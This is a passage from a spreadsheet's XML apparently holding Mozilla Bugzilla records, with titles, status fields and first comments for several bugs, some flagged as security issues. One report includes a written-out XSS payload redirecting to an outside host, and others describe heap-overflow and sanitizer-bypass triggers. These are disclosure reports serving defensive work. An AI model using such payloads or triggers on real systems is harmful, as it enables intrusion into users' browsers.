      </c>
      <c r="L1728" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1728" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1728" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1728" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1728" t="inlineStr">
        <is>
          <t>[sg:critical?] (possible gc race condition?) fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q1728" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1728" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1728" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1728" t="n">
        <v>1</v>
      </c>
      <c r="U1728" t="n">
        <v>0</v>
      </c>
      <c r="V1728" t="n">
        <v>12</v>
      </c>
      <c r="W1728" t="inlineStr">
        <is>
          <t>Creates a root, immediately unroots, value expected to be protected, isn't.  Yikes.</t>
        </is>
      </c>
      <c r="X1728" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1729">
      <c r="A1729" t="n">
        <v>467768</v>
      </c>
      <c r="B1729" t="inlineStr">
        <is>
          <t>2008-12-03 07:08:40 -0800</t>
        </is>
      </c>
      <c r="C1729" t="inlineStr">
        <is>
          <t>No way to make mail open in tabs by default</t>
        </is>
      </c>
      <c r="D1729" t="inlineStr">
        <is>
          <t>2009-09-01 08:15:52 -0700</t>
        </is>
      </c>
      <c r="E1729" t="n">
        <v>1</v>
      </c>
      <c r="F1729" t="n">
        <v>1</v>
      </c>
      <c r="G1729" t="n">
        <v>2</v>
      </c>
      <c r="H1729" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1729" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J1729" t="inlineStr">
        <is>
          <t>Toolbars and Tabs</t>
        </is>
      </c>
      <c r="K1729" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1729" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1729" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1729" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1729" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1729" t="inlineStr"/>
      <c r="Q1729" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1729" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1729" t="inlineStr">
        <is>
          <t>Thunderbird 3.0b3</t>
        </is>
      </c>
      <c r="T1729" t="n">
        <v>1</v>
      </c>
      <c r="U1729" t="n">
        <v>10</v>
      </c>
      <c r="V1729" t="n">
        <v>69</v>
      </c>
      <c r="W1729" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3pre) Gecko/20081201 Lightning/1.0pre Thunderbird/3.0b1
When mail is double clicked on a message always opens in a new window. There is no way to make the message open in a tab which would be nice with the new tabbed messaging.
Only way to get this behaviour is to right click on message and open it in a tab
Reproducible: Always
Steps to Reproduce:
1. Double click e-mail
2. Oh look it opens in a new window
3. Damn</t>
        </is>
      </c>
      <c r="X1729" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1730">
      <c r="A1730" t="n">
        <v>371375</v>
      </c>
      <c r="B1730" t="inlineStr">
        <is>
          <t>2007-02-23 06:59:36 -0800</t>
        </is>
      </c>
      <c r="C1730" t="inlineStr">
        <is>
          <t>[FIX]Websites can test for URLs visited (pdp Firefox Cache Hack - Firefox History Hack redux)</t>
        </is>
      </c>
      <c r="D1730" t="inlineStr">
        <is>
          <t>2013-11-09 10:47:40 -0800</t>
        </is>
      </c>
      <c r="E1730" t="n">
        <v>1</v>
      </c>
      <c r="F1730" t="n">
        <v>1</v>
      </c>
      <c r="G1730" t="n">
        <v>3</v>
      </c>
      <c r="H1730" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1730" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1730" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1730" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L1730" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1730" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1730" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1730" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1730" t="inlineStr"/>
      <c r="Q1730" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1730" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1730" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1730" t="n">
        <v>1</v>
      </c>
      <c r="U1730" t="n">
        <v>0</v>
      </c>
      <c r="V1730" t="n">
        <v>14</v>
      </c>
      <c r="W1730" t="inlineStr">
        <is>
          <t>Subject: Firefox Cache Hack - Firefox History Hack redux
From: "pdp (architect)" &lt;pdp.gnucitizen@googlemail.com&gt;
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com,
	"WASC Forum" &lt;websecurity@webappsec.org&gt;
Date: Fri, 23 Feb 2007 12:32:29 +0000
Message-ID: &lt;6905b1570702230432q5a0a5b7eq4839d709748f9b90@mail.gmail.com&gt;
http://www.gnucitizen.org/projects/hscan-redux/
[...]
This vulnerability is not a reworked version of Jeremiah Grossman
history hack. It is completely different and it should be treated as a
new issue. The peculiar thing about this vulnerability is that it
tells you which URLs you have attended during the current browser
session (the last time you opened your browser). I am not sure how
useful this is.
Keep in mind that attackers can abuse this vulnerability in order to
extract valuable information about your browsing habits. They can also
use this hack to precisely detect whether you are logged into your
router management interface. They can use this hack to detect your
router type and version as well. Based on this information, they might
be able to compromise the integrity of your network.
The POC is located [... below]. If all checks show up as NOT visited, then visit one of the listed URLs and retest again.
http://www.gnucitizen.org/projects/hscan-redux/poc.htm</t>
        </is>
      </c>
      <c r="X1730" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1731">
      <c r="A1731" t="n">
        <v>562547</v>
      </c>
      <c r="B1731" t="inlineStr">
        <is>
          <t>2010-04-28 19:39:03 -0700</t>
        </is>
      </c>
      <c r="C1731" t="inlineStr">
        <is>
          <t>ParanoidFragmentSinks allow javascript: urls in chrome documents</t>
        </is>
      </c>
      <c r="D1731" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1731" t="n">
        <v>1</v>
      </c>
      <c r="F1731" t="n">
        <v>1</v>
      </c>
      <c r="G1731" t="n">
        <v>3</v>
      </c>
      <c r="H1731" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1731" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1731" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1731" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1731" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1731" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1731" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1731" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1731" t="inlineStr">
        <is>
          <t>[sg:vector-critical] [qa-examined-191] [qa-examined-192] [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q1731" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1731" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1731" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1731" t="n">
        <v>1</v>
      </c>
      <c r="U1731" t="n">
        <v>0</v>
      </c>
      <c r="V1731" t="n">
        <v>33</v>
      </c>
      <c r="W1731" t="inlineStr">
        <is>
          <t>The two ns(X)HTMLParanoidFragmentSink classes are used by nsIScriptableUnescapeHTML to sanitize (X)HTML by stripping attributes and tags not on a built-in whitelist. Internally to Firefox this is only used by the feed processor, but it's fairly popular with add-on authors and recommended as a best-practice.
The sinks attempt to sanitize URLs by calling CheckLoadURI[...]DISALLOW_INHERIT_PRINCIPAL), but unfortunately when the target document is a chrome document (as is common with add-ons) this check allows any URI. In particular malicious href="javascript:evil()" or &lt;iframe src="data:evil"&gt; can slip through and create sg-critical bugs.
http://hg.mozilla.org/mozilla-central/annotate/c753325a40ff/content/html/document/src/nsHTMLFragmentContentSink.cpp#l967
and ditto content/xml/document/src/nsXMLFragmentContentSink.cpp
Would it be OK to simply always pass a nsNullPrincipal in instead?
This problem was recently published in a whitepaper referenced at
http://www.securityfocus.com/archive/1/archive/1/510883/100/0/threaded
Cross Context Scripting with Firefox - Roberto Suggi Liverani
Link: http://www.security-assessment.com/files/whitepapers/Cross_Context_Scrip
ting_with_Firefox.pdf
MITRE has apparently assigned this CVE-2010-1585</t>
        </is>
      </c>
      <c r="X1731" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1732">
      <c r="A1732" t="n">
        <v>832162</v>
      </c>
      <c r="B1732" t="inlineStr">
        <is>
          <t>2013-01-17 21:44:11 -0800</t>
        </is>
      </c>
      <c r="C1732" t="inlineStr">
        <is>
          <t>JAR/ZIP crash [@nsZipArchive::BuildSynthetics/HashName]</t>
        </is>
      </c>
      <c r="D1732" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:13 -0800</t>
        </is>
      </c>
      <c r="E1732" t="n">
        <v>1</v>
      </c>
      <c r="F1732" t="n">
        <v>1</v>
      </c>
      <c r="G1732" t="n">
        <v>3</v>
      </c>
      <c r="H1732" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1732" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1732" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K1732" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1732" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1732" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1732" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1732" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1732" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q1732" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1732" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1732" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1732" t="n">
        <v>1</v>
      </c>
      <c r="U1732" t="n">
        <v>0</v>
      </c>
      <c r="V1732" t="n">
        <v>23</v>
      </c>
      <c r="W1732" t="inlineStr">
        <is>
          <t>Created attachment 703762
callstack
This crash happened while fuzzing the JAR/ZIP parser.
./modules/libjar/nsZipArchive.cpp:791
static uint32_t HashName(const char* aName, uint16_t len)
{
...
  while (p != endp) {
    val = val*37 + *p++;
  }
...
To reproduce load the testcase like:
jar:file:///Users/cdiehl/Desktop/testcase.jar!/
Tested with m-c changeset: 119051:ff2e30afa205</t>
        </is>
      </c>
      <c r="X1732" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1733">
      <c r="A1733" t="n">
        <v>1518627</v>
      </c>
      <c r="B1733" t="inlineStr">
        <is>
          <t>2019-01-08 13:27:48 -0800</t>
        </is>
      </c>
      <c r="C1733" t="inlineStr">
        <is>
          <t>Remove the default protocol handler for webcal given it has serious XSS vulnerabilities</t>
        </is>
      </c>
      <c r="D1733" t="inlineStr">
        <is>
          <t>2024-05-30 09:50:52 -0700</t>
        </is>
      </c>
      <c r="E1733" t="n">
        <v>1</v>
      </c>
      <c r="F1733" t="n">
        <v>1</v>
      </c>
      <c r="G1733" t="n">
        <v>2</v>
      </c>
      <c r="H1733" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1733" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1733" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1733" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1733" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1733" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1733" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1733" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1733" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main67+]</t>
        </is>
      </c>
      <c r="Q1733" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1733" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1733" t="inlineStr">
        <is>
          <t>Firefox 67</t>
        </is>
      </c>
      <c r="T1733" t="n">
        <v>1</v>
      </c>
      <c r="U1733" t="n">
        <v>0</v>
      </c>
      <c r="V1733" t="n">
        <v>23</v>
      </c>
      <c r="W1733" t="inlineStr">
        <is>
          <t>Operating system: Ubuntu Linux 18.04 LTS
Firefox version: Firefox Quantum 64.0 (Mozilla Firefox for Ubuntu canonical-1.0)
I was looking around in about:config researching a totally different bug and found the following handler installed (by default i presume as i have not installed it):
gecko.handlerService.schemes.webcal.0.name;30 Boxes
gecko.handlerService.schemes.webcal.0.uriTemplate;https://30boxes.com/external/widget?refer=ff&amp;url=%s
This service is unfortunately vulnerable, and as your general eligibility states that third-party websites utilized are in-scope ("We will pay bounties for vulnerabilities in third-party libraries incorporated into shipped client code or third-party websites utilized by Mozilla.") i thought i would try to report this bug to get this handler removed.
To reproduce: either create the following url as a link or just paste it into the web-browser:
webcal://www.mozilla.org?q=&lt;script&gt;document.location='http://redirected.shellcode.se';&lt;/script&gt;
(I created a simple link to this on a page on my domain: http://poc.shellcode.se/webcal.html)
Firefox asks if you want to open the link with the application "30 Boxes" (Unless the user has clicked "Remember my choice for webcal links"). Clicking ok will transfer the user to the url:
https://30boxes.com/external/widget?refer=ff&amp;url=www.mozilla.org?q=webcal%3A%2F%2Fwww.mozilla.org%3Fq%3D%3Cscript%3Edocument.location%3D'http%3A%2F%2Fredirected.shellcode.se'%3B%3C%2Fscript%3E
This page is vulnerable to XSS and the javascript is executed. In this case only a "harmless" redirect.
I understand that the main bug is not on your domain, but the handler seems to be installed by default and thus affects the standard product.
Thanks for your time!
Best regards
Peter - Sweden</t>
        </is>
      </c>
      <c r="X1733" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1734">
      <c r="A1734" t="n">
        <v>540002</v>
      </c>
      <c r="B1734" t="inlineStr">
        <is>
          <t>2010-01-15 11:29:41 -0800</t>
        </is>
      </c>
      <c r="C1734" t="inlineStr">
        <is>
          <t>Please link "Maemo" to the Nokia for N900 (/maemo) page</t>
        </is>
      </c>
      <c r="D1734" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E1734" t="n">
        <v>1</v>
      </c>
      <c r="F1734" t="n">
        <v>1</v>
      </c>
      <c r="G1734" t="n">
        <v>5</v>
      </c>
      <c r="H1734" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1734" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1734" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1734" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1734" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1734" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1734" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1734" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1734" t="inlineStr"/>
      <c r="Q1734" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1734" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1734" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1734" t="n">
        <v>1</v>
      </c>
      <c r="U1734" t="n">
        <v>0</v>
      </c>
      <c r="V1734" t="n">
        <v>19</v>
      </c>
      <c r="W1734" t="inlineStr">
        <is>
          <t>On the Supported Platforms page, please  link "Maemo" to the Nokia for N900 page (http://www-trunk.stage.mozilla.com/en-US/mobile/maemo/)</t>
        </is>
      </c>
      <c r="X1734" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1735">
      <c r="A1735" t="n">
        <v>20512</v>
      </c>
      <c r="B1735" t="inlineStr">
        <is>
          <t>1999-12-01 13:51:39 -0800</t>
        </is>
      </c>
      <c r="C1735" t="inlineStr">
        <is>
          <t>libjar won't read jdk 1.2.2 jars</t>
        </is>
      </c>
      <c r="D1735" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E1735" t="n">
        <v>1</v>
      </c>
      <c r="F1735" t="n">
        <v>1</v>
      </c>
      <c r="G1735" t="n">
        <v>6</v>
      </c>
      <c r="H1735" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1735" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1735" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K1735" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1735" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1735" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1735" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1735" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1735" t="inlineStr">
        <is>
          <t>[nsbeta2-][nsbeta3+]</t>
        </is>
      </c>
      <c r="Q1735" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1735" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1735" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T1735" t="n">
        <v>1</v>
      </c>
      <c r="U1735" t="n">
        <v>1</v>
      </c>
      <c r="V1735" t="n">
        <v>17</v>
      </c>
      <c r="W1735" t="inlineStr">
        <is>
          <t>Our libjar code returns file-corrupted when trying to read a jar file created by
Sun's JDK 1.2.2 "jar" tool. pkzip and winzip can read these files, suggesting
that the problem is with our code. We'd like to support Sun's tool in some
capacity.</t>
        </is>
      </c>
      <c r="X1735" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1736">
      <c r="A1736" t="n">
        <v>1667179</v>
      </c>
      <c r="B1736" t="inlineStr">
        <is>
          <t>2020-09-24 11:32:55 -0700</t>
        </is>
      </c>
      <c r="C1736" t="inlineStr">
        <is>
          <t>OneCRL does not appear to be working in Fenix</t>
        </is>
      </c>
      <c r="D1736" t="inlineStr">
        <is>
          <t>2022-06-02 00:48:56 -0700</t>
        </is>
      </c>
      <c r="E1736" t="n">
        <v>1</v>
      </c>
      <c r="F1736" t="n">
        <v>1</v>
      </c>
      <c r="G1736" t="n">
        <v>3</v>
      </c>
      <c r="H1736" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1736" t="inlineStr">
        <is>
          <t>GeckoView</t>
        </is>
      </c>
      <c r="J1736" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1736" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1736" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1736" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1736" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1736" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1736" t="inlineStr">
        <is>
          <t>[geckoview:m83][adv-main83+]</t>
        </is>
      </c>
      <c r="Q1736" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1736" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1736" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T1736" t="n">
        <v>1</v>
      </c>
      <c r="U1736" t="n">
        <v>0</v>
      </c>
      <c r="V1736" t="n">
        <v>20</v>
      </c>
      <c r="W1736" t="inlineStr">
        <is>
          <t>OneCRL (Remote Settings) does not appear to be working in Fenix, meaning that Fenix currently has no way to revoke misissued or malicious certificates. This may be related to bug 1625257, if Remote Settings uses `storage.sync`.
This was first reported here:
https://github.com/mozilla-mobile/fenix/issues/14597
With the thought that https://revoked.badssl.com/ was not added to OneCRL, and so therefore didn't trigger the revocation error. However, it was added in bug 1664854 and the error persisted, bringing to light the fact that OneCRL-based certificate revocation appears to be completely nonfunctional in Fenix.
:dveditz, should we remove this (currently innocuous) looking bug from Github?</t>
        </is>
      </c>
      <c r="X1736" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1737">
      <c r="A1737" t="n">
        <v>258005</v>
      </c>
      <c r="B1737" t="inlineStr">
        <is>
          <t>2004-09-04 05:53:14 -0700</t>
        </is>
      </c>
      <c r="C1737" t="inlineStr">
        <is>
          <t>heap overflows triggered by "send page"</t>
        </is>
      </c>
      <c r="D1737" t="inlineStr">
        <is>
          <t>2010-01-23 14:28:03 -0800</t>
        </is>
      </c>
      <c r="E1737" t="n">
        <v>1</v>
      </c>
      <c r="F1737" t="n">
        <v>1</v>
      </c>
      <c r="G1737" t="n">
        <v>3</v>
      </c>
      <c r="H1737" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1737" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J1737" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1737" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1737" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1737" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1737" t="inlineStr">
        <is>
          <t>[sg:fix] fixed1.7.3</t>
        </is>
      </c>
      <c r="Q1737" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1737" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1737" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1737" t="n">
        <v>1</v>
      </c>
      <c r="U1737" t="n">
        <v>0</v>
      </c>
      <c r="V1737" t="n">
        <v>21</v>
      </c>
      <c r="W1737" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040115
Build Identifier: Mozilla/5.0
there are heap based buffer overflows triggered by "send page" and then sending
the email. the overflow is at least in 1.7 and nightly from 3.sep.
the fucked code is in
nsMsgCompUtils.cpp
mime_generate_attachment_headers
one of the overflows is triggered by:
      if (*s == ' ')
        PUSH_STRING("%20");
one char consumes 3 bytes of memory, while only 2 are allocated.
to reproduce try to send as page "data:text/html;,A_LOT_OF_SPACES.
the other buffer overflow is triggered by sending long http urls containing ' ',
not clear which code fucks it.
btw, the macro PUSH_STRING is quite unsafe and i suggest it checks whether there
is enough space left.
Reproducible: Always
Steps to Reproduce:
will attach testcases.
Actual Results:  
the heap is fucked up
Expected Results:  
the heap is not fucked up</t>
        </is>
      </c>
      <c r="X1737" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1738">
      <c r="A1738" t="n">
        <v>1319208</v>
      </c>
      <c r="B1738" t="inlineStr">
        <is>
          <t>2016-11-21 14:01:41 -0800</t>
        </is>
      </c>
      <c r="C1738" t="inlineStr">
        <is>
          <t>Google search history not cleared on erase</t>
        </is>
      </c>
      <c r="D1738" t="inlineStr">
        <is>
          <t>2016-11-22 17:55:16 -0800</t>
        </is>
      </c>
      <c r="E1738" t="n">
        <v>1</v>
      </c>
      <c r="F1738" t="n">
        <v>1</v>
      </c>
      <c r="G1738" t="n">
        <v>2</v>
      </c>
      <c r="H1738" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1738" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J1738" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1738" t="inlineStr">
        <is>
          <t>2.0.1</t>
        </is>
      </c>
      <c r="L1738" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1738" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1738" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1738" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1738" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q1738" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1738" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1738" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1738" t="n">
        <v>1</v>
      </c>
      <c r="U1738" t="n">
        <v>0</v>
      </c>
      <c r="V1738" t="n">
        <v>5</v>
      </c>
      <c r="W1738" t="inlineStr">
        <is>
          <t>STR:
1) Go to google.com
2) Search "mozilla"
3) Press Erase
4) Go to google.com
You'll then see "mozilla" as a drop-down suggestion. This should have been cleared after erasing.</t>
        </is>
      </c>
      <c r="X1738" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1739">
      <c r="A1739" t="n">
        <v>491722</v>
      </c>
      <c r="B1739" t="inlineStr">
        <is>
          <t>2009-05-06 12:28:48 -0700</t>
        </is>
      </c>
      <c r="C1739" t="inlineStr">
        <is>
          <t>nsObjectFrame doesn't properly handle NPP_New failing for NP_FULL [@libgobject-2.0.so.0.2000.1@0x29302 ]</t>
        </is>
      </c>
      <c r="D1739" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1739" t="n">
        <v>1</v>
      </c>
      <c r="F1739" t="n">
        <v>1</v>
      </c>
      <c r="G1739" t="n">
        <v>6</v>
      </c>
      <c r="H1739" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1739" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1739" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1739" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1739" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1739" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1739" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1739" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1739" t="inlineStr">
        <is>
          <t>[sg:critical?][to be fixed by 533030]</t>
        </is>
      </c>
      <c r="Q1739" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1739" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1739" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1739" t="n">
        <v>1</v>
      </c>
      <c r="U1739" t="n">
        <v>0</v>
      </c>
      <c r="V1739" t="n">
        <v>23</v>
      </c>
      <c r="W1739" t="inlineStr">
        <is>
          <t>Created attachment 376052
patch to create a test plugin
steps:
1. find a plugin that returns an error from NPP_New for mode=NP_FULL (you can apply the patch from this comment and build in modules/plugin/test to get one)
2. load your full page plugin, e.g.: data:application/x-test,hi
3. resize the window
Actual Results:
About to create new xtbin of 992 X 721 from (nil)...
firefox-bin: mozilla-central/widget/src/gtkxtbin/gtk2xtbin.c:316: gtk_xtbin_new: Assertion `parent_window != ((void *)0)' failed.
Program received signal SIGABRT, Aborted.
0xb7f1c7f2 in ?? () from /lib/ld-linux.so.2
(gdb) bt
#0  0xb7f1c7f2 in ?? () from /lib/ld-linux.so.2
#1  0xb71a6085 in raise () from /lib/tls/i686/cmov/libc.so.6
